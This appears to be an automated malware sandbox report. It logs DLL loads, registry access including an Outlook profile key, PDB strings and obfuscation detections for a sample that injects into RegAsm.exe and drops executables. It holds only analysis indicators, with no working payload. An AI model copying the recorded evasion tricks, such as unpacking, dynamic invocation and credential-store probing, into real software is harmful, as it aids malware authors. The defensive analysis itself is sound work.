Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwrite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: textshaping.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwrite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msvcp140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msisip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wshext.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: appxsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: opcservices.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: esdsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: scrrun.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: linkinfo.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mozglue.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wsock32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msvcp140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\gobEmOm5sr.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Window found: window name: TMainForm
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\gobEmOm5sr.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Local\Temp\is-9E297.tmp\PsIhedmEA44FNRssEU8V9OlH.tmp Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NewStar_is1
Source: gobEmOm5sr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: gobEmOm5sr.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: gobEmOm5sr.exe Static file information: File size 7097856 > 1048576
Source: gobEmOm5sr.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x659a00
Source: gobEmOm5sr.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: gobEmOm5sr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: \??\C:\Windows\symbols\exe\premium_gitrep.pdbe source: yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000002.2249226369.0000000001207000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdb source: JJdIaooFQpkpcWNUCJ71mJDj.exe, 0000000A.00000002.2204897517.0000000001934000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\sXnMStC.pdbG source: REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2332767463.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2152537664.0000000003D79000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: newPrime_cloud.pdb source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2225232174.000000000158E000.00000004.00000020.00020000.00000000.sdmp, 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000000.1923341342.0000000000BE2000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: \??\C:\Users\user\Documents\iofolko5\8LEi0YA5qqlYpHd7zimCU8lz.PDBf1 source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2225232174.0000000001556000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n<C:\Windows\premium_gitrep.pdb source: yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000002.2233127778.0000000000F39000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: PE.pdb source: gobEmOm5sr.exe, 00000000.00000002.1663150655.0000000005790000.00000004.08000000.00040000.00000000.sdmp, REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2152537664.0000000003D79000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL source: JJdIaooFQpkpcWNUCJ71mJDj.exe, 0000000A.00000002.2204897517.0000000001934000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\wMwlL.pdb source: gobEmOm5sr.exe, 00000000.00000002.1663531403.0000000005A90000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: premium_gitrep.pdb source: yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000000.1922223189.00000000007C2000.00000002.00000001.01000000.0000000A.sdmp, yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000002.2249226369.0000000001256000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\exe\newPrime_cloud.pdb source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2225232174.000000000158E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Documents\iofolko5\newPrime_cloud.pdb source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2225232174.0000000001556000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Documents\iofolko5\premium_gitrep.pdbFk<W source: yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000002.2249226369.0000000001207000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2225232174.000000000153D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: premium_gitrep.pdbx source: yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000000.1922223189.00000000007C2000.00000002.00000001.01000000.0000000A.sdmp, yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000002.2249226369.0000000001256000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: githubsoft.pdb source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: mscorlib.resources.pdbV source: yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000002.2249226369.0000000001207000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2225232174.0000000001556000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BotClient.pdb source: REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000000.1922131393.0000000000282000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: ud.pdbWindowsPowerShell\Modules;C:\Windows\system32\WindowsPowe source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2225232174.000000000158E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 0dows\symbols\dll\mscorlib.pdb source: yh8OwfLgsaGOEy8sLU5UpJIK.exe, 00000008.00000002.2249226369.00000000011F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Documents\iofolko5\newPrime_cloud.pdbN source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2225232174.0000000001556000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\sXnMStC.pdb source: REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2332767463.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, REaoHTwA9AqN_cDvubi9mxZt.exe, 00000006.00000002.2152537664.0000000003D79000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: githubsoft.pdb8 source: gobEmOm5sr.exe, 00000000.00000000.1647082311.0000000000842000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: n<C:\Windows\newPrime_cloud.pdb source: 8LEi0YA5qqlYpHd7zimCU8lz.exe, 00000009.00000002.2221433328.00000000012F9000.00000004.00000010.00020000.00000000.sdmp

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Unpacked PE file: 17.2.lenTsqDIajevXTuJaJ03oKGb.exe.a60000.0.unpack :EW;.rsrc :W;.idata :W; :EW;lxojhmjk:EW;mdoopayt:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;lxojhmjk:EW;mdoopayt:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\NewStar\newstar.exe Unpacked PE file: 39.2.newstar.exe.400000.0.unpack .text:ER;.yhead8:R;.data:W;.rsrc:R;.zhead8:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\NewStar\newstar.exe Unpacked PE file: 39.2.newstar.exe.400000.0.unpack
.NET source code contains method to dynamically call methods (often used by packers)
Source: 0.2.gobEmOm5sr.exe.5790000.5.raw.unpack, Ca01BQGh9DxiBOJwup.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Binary contains a suspicious time stamp
Source: gobEmOm5sr.exe Static PE information: 0xCFD7C7EE [Mon Jul 1 02:05:34 2080 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00565A60 push ecx; ret 2_2_00565A73
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: 7_2_004065C8 push 00406605h; ret 7_2_004065FD
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: 7_2_004040B5 push eax; ret 7_2_004040F1
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: 7_2_00408104 push ecx; mov dword ptr [esp], eax 7_2_00408109
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: 7_2_00404185 push 00404391h; ret 7_2_00404389
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: 7_2_00404206 push 00404391h; ret 7_2_00404389
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: 7_2_0040C218 push eax; ret 7_2_0040C219
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: 7_2_004042E8 push 00404391h; ret 7_2_00404389
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: 7_2_00404283 push 00404391h; ret 7_2_00404389
Source: C:\Users\user\Documents\iofolko5\PsIhedmEA44FNRssEU8V9OlH.exe Code function: 7_2_00408F38 push 00408F6Bh; ret 7_2_00408F63
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe Code function: 17_2_61EDA2A8 push ds; retf 17_2_61EDA2AE
Source: 0.2.gobEmOm5sr.exe.5790000.5.raw.unpack, KASIU9JAUDHSAHJDUHUDASUDUADAI0DKSFISJFUDHUFHHYU.cs High entropy of concatenated method names: 'OMFx84NSU3Aj89yeQCX', 'LAX01SNrXLuYFtkUKZE', 'iy9SsMNm29gB450FtMd', 'dBJrEtNGIa6qVBG9EBQ', 'rVg9gbNXhuTUCax3Faw', 'SqGmZ9Nwos9SN5Q7lkZ', 'GSe2iiNdiIejkDmaBS8', 'LqmMVpNxj2A5NG3wBxw', 'gYNBsNNfxAmxgoLk8AY', 'YxEaVbN7rCtxCfwOIGb'
Source: 0.2.gobEmOm5sr.exe.5790000.5.raw.unpack, psm102r62ZNKXfMgLP.cs High entropy of concatenated method names: 'OPSws322xfEh0', 'MODr39Nq5MiabxlX31k', 'iQoS09NJ2QNv2l3Nldp', 'CJQKDaN3RqE5Z376xIt', 'pj3HvaNg4CuSslIZxHe', 'aGob5JNuDhjrh89tMF7', 'OJrIsVNcKpdpxmnyCdy', 'nvy9T7NQKdlZSSpjdYZ', 'VWEEy8N4s3YgJEZssn2', 'hiS9r5NbbCsErEIxnl5'
